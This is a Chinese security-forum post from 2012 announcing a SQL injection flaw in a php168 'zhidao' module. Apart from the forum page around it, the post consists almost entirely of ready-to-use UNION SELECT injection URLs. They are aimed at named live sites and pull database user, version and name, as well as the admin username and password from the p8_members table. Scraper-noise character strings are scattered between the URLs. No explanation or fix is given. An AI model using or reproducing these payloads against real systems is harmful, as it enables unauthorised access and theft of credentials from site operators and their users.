找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php168某系统注入漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2815|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--: |* s. o1 z3 _% m
                                                         . U4 K7 w, B) j/ d) C% q
                                         z& i2 O& z. ?6 u) {+ Y
8 |! D  {9 [2 U) I
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--% k: m( W4 I8 O& ^' W$ Y" T
                                                     & r7 u8 P! D; R" F+ w% B' \1 V; |
                                                                  
( e( ~+ p0 a4 z; _" B5 m                                                        
  \# _9 g; F* y$ T9 Nhttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--) [; \# \% N; ]* C, p

- z5 i+ o  q5 \& K1 n- [" r8 x  \

& \, J8 x$ E2 P) B1 w                                                            
( b! H2 k& g( S$ ~6 P# x
! Z  H; E+ X, w3 N& E9 v! ]http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
: E- }& m; x0 t1 d/ J
7 E* ^- k+ T/ @7 t
: c6 T% q+ c2 a+ B' X$ V
( S+ O! S* E) a1 z3 H3 r7 \9 |                                                                    
4 T+ C- R7 o) z
系统, database, version

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表